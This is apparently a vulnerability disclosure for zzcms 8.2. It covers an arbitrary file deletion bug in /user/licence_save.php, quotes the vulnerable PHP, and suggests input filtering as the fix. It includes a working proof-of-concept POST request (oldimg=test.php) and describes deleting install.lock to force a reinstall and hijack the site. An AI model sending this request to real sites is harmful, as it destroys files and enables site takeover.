Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
title tags grammar_cjkRuby
licence_save.php
bug
true

user/licence_save.php

Edition :

zzcms 8.2

Location

/user/licence_save.php

Code:

if ($oldimg<>$img && $oldimg<>"/image/nopic.gif"){
			$f="../".$oldimg;
			if (file_exists($f)){
			unlink($f);
			}
			$fs="../".str_replace(".","_small.",$oldimg)."";
			if (file_exists($fs)){
			unlink($fs);		
			}
		}

Rows : 31

Harm

Allows attackers to delete files arbitrarily

Cause the cause

Through the code can know that we only control oldimg, and it did not carry out the appropriate filtering

first create test.php

Then perform the operation, remember to meet $oldimg<>$img && $oldimg<>"/image/nopic.gif"

Then execute

Then find test.php is gone

poc

GET:
http://127.0.0.1:8080/user/licence_save.php?action=modify
POST:
id=11&oldimg=test.php&img=1231

An attacker can use this vulnerability to delete any file, such as deleting install.lock for CMS reinstall and hijacking the website database.

Solution

Can be filtered through the input of control parameters, strictly control the type of parameters, suffixes